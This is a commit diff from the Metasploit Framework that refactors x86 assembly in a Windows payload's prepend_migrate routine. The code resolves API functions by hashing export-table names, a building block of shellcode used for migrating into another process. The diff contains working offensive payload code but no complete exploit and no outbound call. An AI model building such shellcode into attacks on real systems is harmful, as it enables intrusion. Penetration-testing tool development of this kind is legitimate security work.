Add block_api changes to prepend_migrate

egypt · egypt · commit b226ecf59128 · 2014-02-05T15:32:59.000-06:00
diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb
@@ -85,21 +85,24 @@ def prepend_migrate(buf)
       ror edi, 13               ; Rotate right our hash value
       add edi, eax              ; Add the next byte of the name
       loop loop_modname         ; Loop untill we have read enough
+
       ; We now have the module hash computed
       push edx                  ; Save the current position in the module list for later
       push edi                  ; Save the current module hash for later
       ; Proceed to iterate the export address table
       mov edx, [edx+16]         ; Get this modules base address
       mov eax, [edx+60]         ; Get PE header
-      add eax, edx              ; Add the modules base address
-      mov eax, [eax+120]        ; Get export tables RVA
-      test eax, eax             ; Test if no export address table is present
-      jz get_next_mod1          ; If no EAT present, process the next module
-      add eax, edx              ; Add the modules base address
-      push eax                  ; Save the current modules EAT
-      mov ecx, [eax+24]         ; Get the number of function names
-      mov ebx, [eax+32]         ; Get the rva of the function names
+
+      ; use ecx as our EAT pointer here so we can take advantage of jecxz.
+      mov ecx, [eax+edx+120]    ; Get the EAT from the PE header
+      jecxz get_next_mod1       ; If no EAT present, process the next module
+      add ecx, edx              ; Add the modules base address
+      push ecx                  ; Save the current modules EAT
+      mov ebx, [ecx+32]         ; Get the rva of the function names
       add ebx, edx              ; Add the modules base address
+      mov ecx, [ecx+24]         ; Get the number of function names
+      ; now ecx returns to its regularly scheduled counter duties
+
       ; Computing the module hash + function hash
     get_next_func:              ;
       jecxz get_next_mod        ; When we reach the start of the EAT (we search backwards), process the next module
@@ -118,6 +121,7 @@ def prepend_migrate(buf)
       add edi, [ebp-8]          ; Add the current module hash to the function hash
       cmp edi, [ebp+36]         ; Compare the hash to the one we are searchnig for
       jnz get_next_func         ; Go compute the next function hash if we have not found it
+
       ; If found, fix up stack, call the function and then value else compute the next one...
       pop eax                   ; Restore the current modules EAT
       mov ebx, [eax+36]         ; Get the ordinal table rva
@@ -138,6 +142,7 @@ def prepend_migrate(buf)
       push ecx                  ; Push back the correct return value
       jmp eax                   ; Jump into the required function
       ; We now automagically return to the correct caller...
+
     get_next_mod:               ;
       pop eax                   ; Pop off the current (now the previous) modules EAT
     get_next_mod1:              ;
